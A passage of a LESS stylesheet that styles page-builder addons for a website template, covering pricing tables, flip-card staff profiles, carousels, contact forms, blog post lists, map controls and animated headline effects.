		padding:1%;
	}
}
.sppb-nav-tabs >li >a i,
.sppb-nav-pills >li >a i{margin-right:3px;}

/* "Adaptive" style for tabs, from Flex 3.0 */
.sppb-tab {
	.sppb-nav.adaptive {
		>li {
			display:inline-block;
			width:auto;
		}
		&.sppb-nav-pills {
			>li {
				a {
					width:100%; /* Insure it is 100% width inside >li */
				}
			}
		}
	}
}
/* Custom tab (SPPB 3.6.9) */
.sppb-custom-tab {
	.sppb-tab-custom-content {
		padding-top:0;
		margin-top:0;
	}
}


/* Pricing Table */
.sppb-pricing-box {
	border:0;
	padding:0;
	
	    &.sppb-pricing-featured {
			
			.sppb-pricing-header {
				color: #fff;
			}
		
		}	
	
		.sppb-pricing-header {
			padding:25px 20px 20px;
			background:rgba(0,0,0,.05);
		
			>.sppb-pricing-title {
				margin:0;
				padding:0;
				font-size: 125%;
				line-height:1.1;
				font-weight:300;
			
			}
	
			.sppb-pricing-price {
				margin:0;
				padding:0;
				font-size:430%;
				line-height:1.3;
				
				.sppb-pricing-currency {
					font-size: 55%;
					line-height:2.4;
					vertical-align:top;
					text-align:center;
					padding:0 5px;
				}
				
				.sppb-pricing-duration {
					font-size: 40%;
					line-height: 1.7;
					vertical-align:bottom;
					text-align:center;
				}
			}
		}
	
	.sppb-pricing-features {
		padding: 0;
		>ul {
			list-style: none;
			padding: 0;
			margin: 0;

			>li {
				display: block;
				padding: 12px 20px;

				&:nth-child(odd) {
					border-top:1px solid rgba(0,0,0,.1);
					border-bottom:1px solid rgba(0,0,0,.1);
				}

			}
			
		}
	}
	.sppb-pricing-footer {
		background:rgba(0,0,0,.05);
		border-top:1px solid rgba(0,0,0,.1);
		padding:20px;
		>a.sppb-btn {
			margin:0 auto;
	
			>i {
				margin-right:5px;
				&.pe {
					font-size:120%;
					vertical-align:middle;
					margin:-3px 5px 0 0;
					line-height:1.4;
				}
			}
		}
	}
}
.transparent {
	.sppb-pricing-box {
		border:0;
		box-shadow:none;
		
		.sppb-pricing-header {
			background:transparent;	
		}
		
		&.sppb-pricing-featured {
			
			.sppb-pricing-header {
				background-color: transparent;
			}
		
		}	
		.sppb-pricing-features {
			padding: 10px 0;
			>ul {
				>li {
					border:0;
					padding: 10px 20px;
				}	
			}
		}
		
		.sppb-pricing-footer {
			background:transparent;
			border:0;	
		}
	}	
}
.flex {
	.sppb-pricing-box {
		border:0;
		padding:0;
	
		.sppb-pricing-header {
			padding:25px 20px 20px;
			background:transparent;
		
		}
		.sppb-pricing-features {
			padding: 20px 0;
			>ul {
				list-style: none;
				padding: 0;
				margin: 0;
	
				>li {
					display: block;
					padding: 8px 0;
					
					&:nth-child(odd) {
						background:rgba(0,0,0,.03);
					}

				}
			}
		}
		.sppb-pricing-footer {
			padding:20px;
			>a.sppb-btn {
				&.sppb-btn-block {
					font-size:120%;
					border:1px solid rgba(0,0,0,.15);
					border-radius:0;
					margin:-1px 0 0;
					line-height:2.5;
				}
			}
		}
		
		&.sppb-pricing-featured {
			background:transparent;
			.sppb-pricing-header {
				padding:25px 20px;
				color:#fff;
			}

		}	
	}
}

//Text Block Addon
.sppb-addon-text-block {
	.sppb-addon-title {
		line-height:1.3;
	}
}

//Person (Default style)

.sppb-addon-person .sppb-addon-content > div {
  margin-top: 15px;
}
.sppb-addon-person .sppb-addon-content > div:first-child {
  margin-top: 0;
}
.sppb-addon-person .sppb-person-information > span {
  display: block;
}
.sppb-addon-person .sppb-person-information > span.sppb-person-name {
  font-size: 17px;
  line-height:1.5;
  font-weight: bold;
}
.sppb-addon-person .sppb-person-information > span.sppb-person-designation {
  font-size: 13px;
  color: #888;
}
.sppb-addon-person .sppb-person-social {
  list-style: none;
  display: block;
  padding: 0;
  margin: 0 -8px;
}
.sppb-addon-person .sppb-person-social > li {
  display: inline-block;
  margin: 0 8px;
}
.sppb-addon-person .sppb-person-social > li > a {
  display: block;
  font-size: 16px;
  line-height: 16px;
  color: #999;
}
.sppb-addon-person .sppb-person-social > li > a:hover {
  color: #666;
}

//Person (Flex style)
.flex.flip-container {
		-webkit-perspective:680;-moz-perspective:680;perspective:680;-ms-perspective:680;-o-perspective:680;
		
		.flipper {
			position:relative;
			display:block;
		   -webkit-transform-style:preserve-3d;-moz-transform-style:preserve-3d;-ms-transform-style:preserve-3d;-o-transform-style:preserve-3d;transform-style:preserve-3d;
		
			.front,
			.back {
			-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-o-backface-visibility:hidden;backface-visibility:hidden;-webkit-transition:1s;-o-transition:1s;transition:1s;-webkit-transform-style:preserve-3d;-moz-transform-style:preserve-3d;-ms-transform-style:preserve-3d;-o-transform-style:preserve-3d;transform-style:preserve-3d;
			padding:0 0 12px;
			}
			.front{
				z-index:2;
				-webkit-transform:rotateY(0deg);
				-moz-transform:rotateY(0deg);
				-ms-transform:rotateY(0deg);
				-o-transform:rotateY(0deg);
				transform:rotateY(0deg);
				position:relative;
				
				.sppb-person-information {
				padding:0 15px;
				}
			}
			.back{
				z-index:1;
				-webkit-transform:rotateY(-180deg);
				-moz-transform:rotateY(-180deg);
				-ms-transform:rotateY(-180deg);
				-o-transform:rotateY(-180deg);
				transform:rotateY(-180deg);
				position:absolute;
				top:0;
				height:100%;
				width:100%;
				left:0;
			
			.sppb-person-block {
				background:#888;
				display:inline-block;
				width:100%;
				margin:0;
				padding:0;
				
				>.thumb {
					float:left;
					width:40%;
						>img {
							width:100%;
							height:auto;
							margin:0 15px 0 0;
						}
				}
	
				.sppb-person-information {
					padding:15px 5px 0 12px;
					width:60%;
					display:block;
					float:left;
					text-align:left;
					font-size:90%;
					
					.sppb-person-name {
						margin:0 0 10px 0;
						color:#fff;
					}
					.sppb-person-designation {
						line-height:1.4;
						color:#ddd;
					}
					&.flip {
					   padding:15px 15px 0;
					   width:100%;
					   .sppb-person-name {
							color:lighten(@text_color, 35%);;
						}
						.sppb-person-designation {
							color:lighten(@text_color, 25%);
						}
					}
				}
				&.flip {
				   background:transparent;
				}
			}
			
				.sppb-person-introtext {
					display:block;
					clear:both;
					text-align:left;	
					padding:0 15px;
					line-height:1.5;
					font-size:90%;
				}
				
				.sppb-person-social-icons {

					position:absolute;
					width:100%;
					bottom:2.5%;
				}
				
				&.flip {
				   background:transparent;
				}
			
			}
		}
		
		&:hover {
			.flipper { 
				.front {
				-webkit-transform:rotateY(180deg);-moz-transform:rotateY(180deg);-ms-transform:rotateY(180deg);-o-transform:rotateY(180deg);transform:rotateY(180deg);
				}
				.back {
					-webkit-transform:rotateY(0deg);-moz-transform:rotateY(0deg);-ms-transform:rotateY(0deg);-o-transform:rotateY(0deg);transform:rotateY(0deg);
				}
			}
		}
		

}


// Progress bar ("flex")
.sppb-progress {
	padding:0;
	margin:0;
}

// Progress bar ("flex")
.flex-text-wrapper {
	margin:15px 0 3px;
	.flex-text {
		margin: 20px 0 0;
		display:table-cell;
		width:1%;
	}
	.flex-progress-text {
		margin: 20px 0 0;
		width:1%;		
		display:table-cell;
		text-align:right;
	}
}
// Centered class
.centered {
	text-align:center;
	
	>div,>a {
		text-align:center;
	}
}

//Testimonials
.sppb-media.default {
	>a {
		>img, >i {
			.transition(~'border-color 300ms');
			margin-top:2px;
		}
	}
	i {
		border:1px solid #ccc;
		border-radius:4px;
		font-size:220%;
		color:#ccc;
		background:#f1f1f1;
		box-shadow:inset 0 0 0 4px #fff;
		line-height:1;
		text-align:center;
		
		&.pe-7s-link {
			font-size:140%;
			color:#aaa;
			padding:3px 5px;
			background:transparent;
			border:none;
		}
	}
	footer {
		margin:10px auto;
	}
	
}
.sppb-media.flex {
	>a {

		>img, >i {
			.transition(~'border-color 300ms');
		}
		>img.sppb-media-object {
			margin:3px auto 0;
			border-radius:4px;
			border:1px solid #ddd;
			padding:4px;
		}
		
		
	}

	.div-pull-center {
		margin:0 auto 12px;
		clear:both;
	}
	
	img.sppb-media-object {
		margin-top:6px;
		border-radius:3px;
	}
	i.fa-user, i.fa-user-plus {
		margin-top:4px;
		border:1px solid #ddd;
		border-radius:4px;
		font-size:220%;
		color:#ccc;
		background:#f1f1f1;
		box-shadow:inset 0 0 0 4px #fff;
		text-align:center;
	}	
	>.sppb-media-body {
			line-height:1.6;

		>i.fa, >i.fas {
			font-size:22px;
			width:20px;
			line-height:1;
			vertical-align:middle;
	
			&.fa-quote-left {
				margin:-2px 10px 2px 0;
				display:inline-block;
			}
		    &.fa-quote-right {
				margin:1px 0 0 10px;
				display:inline-block;
			}
		}
	
		footer {
			margin:10px auto 0;
			width:100%;
			clear:both;
		}
		
	}
}
// Ajax Contact Form
.sppb-addon-ajax-contact {
	
	.sppb-ajaxt-contact-form {
		
		.gutter {
			padding:0 10px;/* initial gap (spacing) between columns */
		}
		.sppb-form-group {
			margin:0 auto 10px;
			padding:0 5px; /* fixed gap (spacing) between columns */
			
			label {
				padding:0 3px;
			}

			input {
				height:38px;
			}
			.sppb-form-control {
		
				&[placeholder] {
						
				line-height:1.9;
				border:1px solid #c9c9c9;
				box-shadow:none;
				background:transparent;
				.transition(all .3s ease-in-out .2s);
		
					&::-moz-placeholder {

						.transition(all .4s ease-out);
						opacity:1;	
						
					}
					&::-webkit-input-placeholder {

						.transition(all .3s ease-in-out .15s);
						opacity:1;
						text-indent:-1px;
						
						&:before {
						  font-family: 'peIcon7';
						  opacity:.8;
						  text-align:center;
						  width:44px;
						  margin-right:7px;
						  font-size:125%;
						  line-height:1.33;
						  vertical-align:top;
						}
					}
	
					&:focus {
						&::-moz-placeholder {
							opacity:0.2;				
						}
						&::-webkit-input-placeholder{
							opacity:0;
							text-indent:-25px;
						}
					}
					
						
					&.input-name[placeholder] {
						&::-webkit-input-placeholder {
							&:before {
							  content: "\e605";
							}
						}
					}
					&.input-email[placeholder] {
						&::-webkit-input-placeholder {
							&:before {
							  content: "\e639";
							}
						}
					}	
					&.input-subject[placeholder] {
						&::-webkit-input-placeholder {
							&:before {
							  content: "\e62c";
							}
						}
					}
					&.input-message[placeholder] {
						&::-webkit-input-placeholder {
							&:before {
							  content: "\e66d";
							}
						}
					}
					
					&.input-captcha[placeholder] {
						&::-webkit-input-placeholder {
							text-indent:2px;
						}
					}
				}
			}
		}
		
		/* Checkbox (terms of service) */
		.tos {
			label {
				padding:5px 0;
				> input {
					margin:0 5px;
				}
			}
		}
		/* Button */
		.sppb-btn {
			margin:7px 0;
			line-height:1.9;
			
			>i.fa, >i.fas {
				margin-right:5px;
				margin-left:-5px;
			}
			>i.pe {
				margin:-2px 5px 0 -5px;
				padding:0;
				text-align:center;
				font-size:120%;
				vertical-align:middle;
				line-height:1;
			}
		}
	}
	&.dark {
	
		.sppb-form-control {
			
			&[placeholder] {
				line-height:1.9;
				box-shadow:none;
				
				&::-webkit-input-placeholder {
					
					&:before {
					  opacity:0.7;
					}
				}
				
				&:focus {
					box-shadow:none;
					&::-moz-placeholder {
						opacity:0.2;			
					}
					&::-webkit-input-placeholder{
						opacity:0;
						text-indent:-30px;
					}
				}
			}
		}
	}
}


.sppb-carousel-flex {
	.sppb-carousel-inner {
		
		>.sppb-item{
		 width:100%;
		 height:100%;
		 margin:0;
         .transition(.7s cubic-bezier(0.65,0,0.35,1));
		 &.sppb-item-has-bg {
			
			 img {
				margin:0 auto;
				padding:0;
	
			 }
		 }
			.sppb-carousel-item-inner {
				
				 .sppb-carousel-caption { 
					margin:0 auto;
					text-align:center;
					
					.sppb-carousel-pro-text {
						>h2 {
							margin:0 auto;
						}
						>p {
							margin:25px auto 0;
						}
					}
				}
		    }
		}
	}
	
	.sppb-carousel-arrow {
		top: 50%;
		font-size: 27px;
		width: 32px;
		height: 32px;
		line-height: 29px;
		margin-top: -16px;
		text-align: center;
		background: rgba(0, 0, 0, 0.3);
		border-radius: 4px;
		.transition(all .2s ease-in-out .1s);
		opacity:0;
		
		i.fa, i.fas {
			text-shadow:none;
			color: #fff;
			
			&.fa-angle-left{
				margin: -15px 0 0 -6px;
			}
			&.fa-angle-right{
				margin: -15px -6px 0 0;
				
				text-indent:2px;
				text-align:center;
			}
		}
	}

	.sppb-carousel-arrow {
		&.left {
			left: -1px; 
		}
	}

	.sppb-carousel-arrow {
		&.right {
			right: -1px; 
		}
	}
	
	.sppb-carousel-indicators {
		bottom:-10px;
		opacity:0;
		.transition(all .2s ease-in-out .2s);
		li {
			margin:0 5px;
			width:10px;
			height:10px;
			padding:0;
			border:none;
			background:rgba(10,10,10,.12);
			&.active {
				background:rgba(10,10,10,.4);
			}
			
		}

	}
	
	&:hover {
		.sppb-carousel-indicators {
			bottom:10px;
			opacity:1;
		}
		.sppb-carousel-arrow {
			opacity:1;
			&:hover {
				background: rgba(0, 0, 0, 0.5);
			}
			&.left {
				left: 10px; 
			}
			&.right {
				right: 10px; 
			}
		}
	}
}

// Testimonial Flex
.sppb-testimonial-flex {

  .sppb-carousel-inner {
	  > .sppb-item {
			margin:0;
			padding:0;
	  }
  }

  .sppb-img-responsive.sppb-avatar {
    display: inline-block;
  }

  .sppb-testimonial-message,
  .sppb-testimonial-client,
  .sppb-img-responsive.sppb-avatar {
    margin-bottom: 10px;
  }
  .sppb-testimonial-client {
	  h4 {
	  	font-size: 110%;
		font-weight:700;
	  }
  }
  
  .sppb-testimonial-message {
    font-size: 100%;
    line-height: 26px;
  }
	.left {
		>i {
			margin-left:-1px;
		}
	}
	.right {
		>i {
			margin-right:-3px;
	
		}
	}
  .sppb-carousel-control {
    display: inline-block;
    font-size: 20px;
    line-height: 25px;
    width: 28px;
    height: 28px;
    border-radius: 4px;
    text-align: center;
    border: 1px solid #999;
	border: 1px solid rgba(45,45,45,.15);
    color: #888;
    margin: 8px 3px 0;
    .transition(400ms);
    .box-sizing(~'initial');


    &:hover {

	  border: 1px solid @major_color;
    }
  }
}

// Carousel Pro
.sppb-carousel-pro{
	.sppb-carousel-inner {
	  .sppb-item {
		 .sppb-carousel-pro-text {
				text-align:left;
			}
	  }
	}
  .sppb-carousel-indicators {
	  li {
		  margin-right:5px;
	  }
  }
}

// Pie Progress
/* Inline class for Pie progress */
.inline-class {
	.sppb-addon-pie-progress {
		display:table-cell;
		width:1%;
		margin:0 auto;
	}
}
.sppb-addon-pie-progress {
	.sppb-pie-chart {
		.sppb-chart-icon {
			i {
				&.pe {
					vertical-align:middle;
					line-height:1.4;
				}
			}
		}
	}
}

// Slick Carousel
.sppb-addon.flex {
	.slick-desc {
		span, i {
			&.fa {
				font-family: inherit;
				&::before {
					font-family: 'Font Awesome 5 Free';
					font-weight:900;
				}
			}
			&.fas {
				font-family: inherit;
				&::before {
					font-family: 'Font Awesome 5 Free';
					font-weight:900;
				}
			}
			&.pe {
				font-family: inherit;
				&::before {
					font-family: 'peIcon7';
				}
			}
		}
	}
	.slick-prev,
    .slick-next {
		opacity:0;
		.transition(all .3s ease-in-out .1s);
	}
	.slick-prev {
		left:-20px;
	}
	.slick-next {
		right:-20px;
	}
	
	&:hover {
		.slick-prev,
		.slick-next {
			opacity:1;
		}
		.slick-prev {
			left:0;
		}
		.slick-next {
			right:0;
		}
	}
}

// Latest blog posts (addon)
.latest-post {
	margin-bottom: 30px;
	.latest-post-inner {
		padding:0;
		.transition(400ms);
		.entry-meta{
			font-weight:200;
			font-size:90%;
			margin-bottom: 20px;
			.transition(400ms);
		}
		h2.entry-title{
			font-size:135%;
			margin-bottom: 20px;
			line-height:1.35;
			font-weight: 500;
		}
		div.img-wrapper {
			position: relative;
			overflow: hidden;
			margin-bottom: 20px;

			>a {
				>img.post-img {
					-webkit-transform: scale3d(1, 1, 1);
					transform: scale3d(1, 1, 1);
					-webkit-transition: all .4s ease-in-out .1s;
					transition: all .4s ease-in-out .1s;	
				}
			}
			&:hover{
				>a {
					>img.post-img {
						-webkit-transform: scale3d(1.12, 1.12, 1);
						transform: scale3d(1.12, 1.12, 1);
					}
				}
			}
		}
		p.intro-text{
			margin-bottom: 20px;
		}
		.post-author{
			font-weight:600;
			font-size:90%;
		}
		.category{

			font-size:90%;
			&.cat-inline {
			   margin:0 12px;
			}
			a {
			   font-weight:600;
			}
		}
	}
				
	.column-1.pull-left,
	.column-1.pull-right {
	   margin:0;	
	}
}
.blog{
	.latest-post {
		margin-bottom: 25px;
		.latest-post-inner, .column-1{
			background: #fff;
			padding: 20px;
			border:none;
			box-shadow:none;
			.transition(400ms);

			h2.entry-title{
				font-size: 140%;
				font-weight: 500;
				margin-bottom: 20px;
				line-height:1.3;
				>a {
					display:block;
				}
			}
			p.intro-text{
				margin-bottom: 20px;
			}
			.post-author{
				font-weight: 500;
				margin-bottom:0;
			}
			.category{
				margin-bottom:0;
				a {
				   font-weight:600;
				}
			}
			&:hover{
				background: #f7f7f7;
				/*box-shadow:inset 0 0 0px 1px #fff;*/
				.entry-meta{
					color:#999;
				}
			}
		}
	}
}
.flex{
	.latest-post{
		.latest-post-item {
			
			background: #fff;
					
			div.img-wrapper{
				position: relative;
				overflow: hidden;
				 max-width:100%;
				>a {	
										
					>img.post-img {
						.transition(250ms);
						-webkit-transform: scale3d(1, 1, 1);
						transform: scale3d(1, 1, 1);
					}

					&:after {
						display: block;
						position: absolute;
						content:"";
						bottom: 0;
						box-shadow:0;
						width: 100%;
						height: 100%;
						text-align: center;
						color: #fff;
						opacity: 0;
						.transition(300ms);
					}
					.caption-content {
						position: absolute;
						font-weight: 500;
						font-size:110%;
						color:#fff;
						padding:0 10%;
						top: 50%;
						width: 100%;
						text-align: center;
						.transition(350ms);
						transform: translateY(0%);
						text-shadow:1px 1px 1px rgba(0,0,0,.2);
						opacity:0;
						z-index:2;
					}
					.caption-category {
						padding:2px 12px;
						display:table;
						width:auto;
						margin:8px auto 0;
						background:rgba(255,255,255,.25);
						border-radius:4px;
						box-shadow:0 1px 1px rgba(0,0,0,.1);
						font-weight: 500;
						font-size:12px;
						color:#fff;
						.posted-in {
							opacity:0.65;
						}
					}

				}
				&:hover{
					background:rgba(255,255,255,0.5);
					>a {
						&:after {
							opacity:0.85;
						}
						.caption-content {
							opacity:1;
							transform: translateY(-50%);
						}
					}
				}

			}
			.latest-post-inner{
				padding: 20px;
				box-shadow:inset 0 0 0px 1px #fff;
				.transition(400ms);
				
	
				h2.entry-title{
					font-size: 135%;
					line-height:1.3;
					margin:1px 0 12px 0;
					>a {
						display:block;
					}
				}
				.entry-meta{
					font-weight:200;
					font-size:85%;
					margin: 10px 0;
					color:#999;
					.transition(400ms);
				}
				p.intro-text{
					margin: 10px 0 0;
				}
				.post-author{
					font-weight: 500;
					margin: 15px 0 0;
					font-size:90%;
					.entry-author {
						color:#999;
					}
				}
				.category{
					color:#999;
					margin:15px 0 0;
					&.cat-inline {
					   margin:0 12px;
					}
					a {
					   font-weight:600;
					}
				}
				&:hover{
					background: #f8f8f8;
					.entry-meta{
						color:#999;
					}
				}
			}
			.post-divider {
				width:100%;
				height:30px;
				display:block;
			}
		}
	
	}
}

// Divider Addon (fixed height at start, after SPPB 3.3.3 error)
.sppb-divider{
	display:block;
}

// Gallery Addon
.sppb-addon-gallery {
	li {
		img {
			.transition(all .3s ease-in-out);
		}
		&:hover {
			img {
				opacity:.8;
			}
		}
	
	}
}

// Google Maps (addon)
.sppb-addon-gmap {
	
	.sppb-addon-content {

		.gm-zoom-in, .gm-zoom-out {
			height: 30px;
			width: 30px;
			border-radius:3px;
			cursor: pointer;
			margin-left: 10px;
			background-color:rgba(40,40,40,.25);
			background-repeat: no-repeat;
			background-size: 30px 60px;
			background-image: url(../images/gmap-icon.svg);
			.transition(all .3s ease-in-out);
			&:hover {
			  background-color:rgba(40,40,40,.4);
			}
		}
		.gm-zoom-in {
			background-position: 50% 0;
			margin-top: 10px;
			margin-bottom: 2px;
		}
		.gm-zoom-out {
			background-position: 50% -30px;
		}
		.sppb-addon-gmap-canvas {
			background:transparent!important;
		}
	}
}

// Removes Google Logo, terms of use, and Report a problem
a[href*="//maps.google.com/maps"],
.gmnoprint a, .gmnoprint span, .gm-style-cc  {
	display:none!important;
}


/* Flickr */

.sppb-addon-flickr ul.sppb-flickr-gallery {
	li {
		padding:5px;
		margin:0 -0.01%;
		
		a {
			.transition(opacity .3s ease-in-out);
			overflow:hidden;
			padding:0;
			-webkit-transform: scale(1);
            transform: scale(1);

			img {
				object-fit: cover;
				padding:0;
				width:100%;
				-webkit-transform: scale(1);
				transform: scale(1);
				.transition(transform .3s ease-in-out);
			}
		
			&:hover {
				padding:0;
				opacity:0.85;
				-moz-opacity:0.85;
				-webkit-transform: scale(1);
				transform: scale(1);
				
				
				img {
					-webkit-transform: scale(1.15);
					transform: scale(1.15);
				}
				
			}
		
		}
		a:before {
			background: rgba(100,100,100,0.2);
		}
		a:after {
			font-family: "peIcon7";
  			content: "\e618";
			font-weight:600;
			font-size:32px;	
			text-shadow:1px 1px 2px rgba(0,0,0,0.1);
		}
	}
}

.firefox {
	ul.sppb-flickr-gallery {
		li {
			a {
				img {
					-webkit-transform: scale(1);
					transform: scale(1);
				}
			}
		}
	}
}

/* Plyr HTML5 Media Player - "minimal" Class */
.sppb-addon-plyr.minimal {
	.plyr--audio {
		.plyr__controls {
			padding:0;
			background:transparent;
			border:0;
			box-shadow:none;
		}
	}
	.plyr__progress--buffer,
	.plyr__progress--played,
	.plyr__volume--display{
	   height:4px;
	   margin:-2px 0 0;
	   
	}


	.plyr input[type=range]::-webkit-slider-thumb{
		margin-top:-2px;
		height:12px;
		width:12px;
	}

 	.plyr__tooltip {
		margin-bottom:6px;
	}
}

// Countdown addon
.sppb-addon-countdown {
	.sppb-countdown-number {
		text-align: center;
		font-weight: normal;
	}
	
	span.sppb-countdown-text {
		text-align:center;
		margin:0 auto;
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center); 
	}
}

// Timeline addon (from SPPB 2.3.5)
.sppb-addon-timeline {
	.sppb-addon-timeline-wrapper {
		
		&:before {
			background-color: #aaa;
			top: 7px;
			bottom:-7px;
			width: 1px;
		}
		.timeline-badge {
			height: 90px;
			position: absolute;
			left: 50%;
			z-index: 5;

			&:before {
				font-size: 30px;
				border: 2px solid #aaa;
				height: 16px;
				width: 16px;
				z-index: 1;
			}
			
			&:after{
				background: #ddd none repeat scroll 0 0;
				content: "";
				height: 1px;
				left: 0;
				position: absolute;
				top: 37px;
				width: 28px;
			}
		}
		
		.odd .timeline-badge:after{
			left: auto;
			height: 1px;
			right: 0;
			top: 44px;
		}

		.timeline-item {
			.timeline-panel {
				padding:17px 22px!important;
				text-align: initial;
				border: solid 1px #d0d0d0;
				border-radius: 5px;
				position: relative;
				width: 75vw;
				margin-left: 15px;
				
				.details {
					padding:0;
					background:transparent;
					border:none;
					-webkit-box-shadow: none;
					box-shadow: none;
				}
				&.left-part:before {
					top: 34px;			   
				}			
			}
		}
	}
}

// Form Builder Addon (from SPPB 3.4.4)
select.sppb-form-control:not([size]):not([multiple]) {
    height: 40px;
}
.sppb-form-builder-range-output {
	top:-26px;
	line-height:21px;
	padding:0;
}

//.sppb-sp-slider-text,.sppb-sp-slider-title{display:table;word-break:none;}


// Slideshow Addon (from SPPB 3.6.1) slide effect
.sp-slider.sp-basic-slider .sp-item,
.sp-slider.sp-stack-slider .sp-item,
.sp-slider.on-3d-active .sp-item {
	transition-timing-function:cubic-bezier(0.5,0,0.3,1);
	-moz-transition-timing-function:cubic-bezier(0.5,0,0.3,1);
	-webkit-transition-timing-function:cubic-bezier(.0.5,0,0.3,1);
}
.sp-slider.sp-bubble-slider .sp-item {
	transition-timing-function:ease;
	-moz-transition-timing-function:ease;
	-webkit-transition-timing-function:ease;
}

// Image Overlay addon animation (cubic-bezier)
.sppb-addon-overlay-image .overlay-background-image,
.overlay-image-title,
.overlay-image-title .sppb-addon-subtitle {
	-webkit-transition-timing-function:cubic-bezier(0.45,0,0.3,1);
	-moz-transition-timing-function:cubic-bezier(0.45,0,0.3,1);
	transition-timing-function:cubic-bezier(0.45,0,0.3,1);
	-webkit-transition-duration:.7s;
	-moz-transition-duration:.7s;
	transition-duration:.7s;
}

// Animated Headlines (custom) Addon
.animated_headlines {
	
	.before-text {
		margin-right:.1em;
	}
	
	.after-text {
		margin-left:.1em;

	}
	.ah-words-wrapper {
		display: inline-block;
		position: relative;
		text-align: left;
		vertical-align: top;
		margin:0;
		top:0;
	
		b {
			display: inline-block;
			width: auto;
			position: absolute;
			white-space: nowrap;
			left: 0;
			top: 0;
			font-weight: inherit;
			
			i {
				font-style: inherit;
			}
		
			&:before {
				content: '';
				position:relative;
				padding:0 0 0 0.15em;
			}
			&:after {
				content: '';
				position:relative;
				padding:0 0.15em 0 0;
			}
			&.is-visible {
				position: relative;
				
			}
		}
	}

	/* Rotate-1 Effect */
	&.rotate-1 {
		.ah-words-wrapper {
			.perspective(300px);
		}
		b {
			opacity: 0;
			.transform-origin(50% 100%);
			.rotateX(180deg);
		}
		b.is-visible {
			opacity: 1;
			.rotateX(0deg);
			.animation(cd-rotate-1-in 1.2s);
			
		}
		
		b.is-hidden {
			.rotateX(180deg);
			.animation(cd-rotate-1-out 1.2s);
		}
	}
	
	
	/* Type Effect */
	&.type {
		overflow: hidden;
		.transition(all .3s ease-in-out);
		width: auto;
		
		.after-text {
			margin-left:.15em;
		}
		
		.ah-words-wrapper {
			overflow: hidden;
			width: auto;
			padding:0 2px;
			
			.transition(all .3s ease-in-out);
			
			i {
				text-indent:2px;
				
			}
			
			&.waiting {
				&::after {
					.animation(cd-pulse 1s infinite);
				}
			}
			
			&.selected {
				background-color: #eee;
				&::after {
					visibility: hidden;
				}
				b {
					color: #0d0d0d;
				}
			}
			
			&::after {
				content: '';
				position: absolute;
				right: 0;
				top: 45%;
				bottom: auto;
				height: 90%;
				width: 10px;
				border-right: 2px solid @major_color;
				.translate(0; -50%);
			}
			
			b {
				visibility: hidden;
				vertical-align: top;

				.transition(all .2s ease);
				
				&.is-visible {
					visibility: visible;
				}
				
				i {
					position: absolute;
					
					
					&.in {
						position: relative;
						visibility: visible;
					}
				}
				&:after {
					padding:0;
				}
			}
		}
	}
		
	/* Rotate-2 Effect */
	&.rotate-2 {
		.ah-words-wrapper {
			.perspective(300px);
		}
		
		b {
			opacity: 0;
		}
		i, em {
			display: inline-block;
			.backface-visibility(hidden);
		}
		i {
			-webkit-transform-style: preserve-3d;
			-moz-transform-style: preserve-3d;
			-ms-transform-style: preserve-3d;
			-o-transform-style: preserve-3d;
			transform-style: preserve-3d;
			-webkit-transform: translateZ(-20px) rotateX(90deg);
			-moz-transform: translateZ(-20px) rotateX(90deg);
			-ms-transform: translateZ(-20px) rotateX(90deg);
			-o-transform: translateZ(-20px) rotateX(90deg);
			transform: translateZ(-20px) rotateX(90deg);
			opacity: 0;
			
			&.in {
				.animation(cd-rotate-2-in 0.4s forwards);
			}
			&.out {
				.animation(cd-rotate-2-out 0.4s forwards);
			}
		
		}
		&.is-visible {
			 i {
		  		opacity: 1;
			}
		}
		em {
			display: inline-block;
			.translate3d(0; 0; 20px);
		}	
	}
	
	/* Loading Bar Effect */
	&.loading-bar {
		span {
			display: inline-block;
		}
		.ah-words-wrapper {
			overflow: hidden;
			
			&::after {
				content: '';
				position: absolute;
				left: 0.02em;
				bottom: 0;
				height: 3px;
				width: 0;
				background-color: @major_color;
				z-index: 2;
				.transition(width 0.3s -0.2s ease);
			}
		}
		.ah-words-wrapper.is-loading {
			&::after {
				width: 100%;
				.transition(width 3s ease);
				
			}
		}
		b {
			top: 0;
			opacity: 0;
			visibility: hidden;
			.translate(-115%; 0);
			.transition(all 0.7s cubic-bezier(0.350,0,0.3,1.1));
			
		}
		b.is-visible {
			opacity: 1;
			top: 0;
			visibility: visible;
			.translate(0; 0);
		}
	}
	
	/* Slide Effect */
	&.slide {
		span {
			display: inline-block;
		}
		.ah-words-wrapper {
			overflow: hidden;
			vertical-align: top;
			
			b {
				opacity: 0;
				top: .2em;
				
				&.is-visible {
					top: 0;
					opacity: 1;
					.animation(slide-in 0.6s);
				}
				&.is-hidden {
					.animation(slide-out 0.6s);
				}
			}	
		}	
	}
	
	/* Clip Effect */
	&.clip {
		
		span {
			display: inline-block;
		}
		.ah-words-wrapper {
			overflow: hidden;
			margin:0 1px;
			
			&::after {
				content: '';
				position: absolute;
				top: 0;
				right: 0;
				width: 3px;
				height: 99%;
				background-color: @major_color;
			}
		}
		b {
			opacity: 0;
			padding:0 3px 0 0;
			line-height:1.4;
			
			&.is-visible {
				opacity: 1;
			}
		}
	}
	
	/* Reset width on animation */
	&.reset-width {
		span {
			display: inline-block;
		}
		.ah-words-wrapper {
			overflow: hidden;
			margin: 0;		
			top: 0;
		}
	}
	
	/* Zoom */
	&.zoom {
		
		.ah-words-wrapper {
			.perspective(400px);
		}
		
		b {
			opacity: 0;
			
			&.is-visible {
				opacity: 1;
				.animation(zoom-in .8s ease-in-out);
			}
			&.is-hidden {
				.animation(zoom-out .8s ease);
			}
		}	
	}
	
	/* Rotate-3 */
	&.rotate-3 {
		.ah-words-wrapper {
			.perspective(300px);
		}
		b {
			opacity: 0;
		}
		i {
			display: inline-block;
			.rotateY(180deg);
			.backface-visibility(hidden);
		}
		i.in {
			.animation(cd-rotate-3-in 0.6s forwards);
		}
		i.out {
			.animation(cd-rotate-3-out 0.6s forwards);
		}
	}
	
	/* Scale Effect */
	&.scale {
		
		b {
			opacity: 0;
		}
		i {
			display: inline-block;
			opacity: 0;
			.scale(0);
		}
		i.in {
			.animation(scale-up 0.6s forwards);
		}
		i.out {
			.animation(scale-down 0.6s forwards);
		}
	}
	
	/* Push */
	&.push {
		b {
			opacity: 0;
		}
		b.is-visible {
			opacity: 1;
			.animation(push-in 1s cubic-bezier(0.150,0,0.300,1.050));
		}
		b.is-hidden {
			.animation(push-out 1s cubic-bezier(0.150,0,0.300,1.050));
		}
	}
}

/* No CSS transitions */
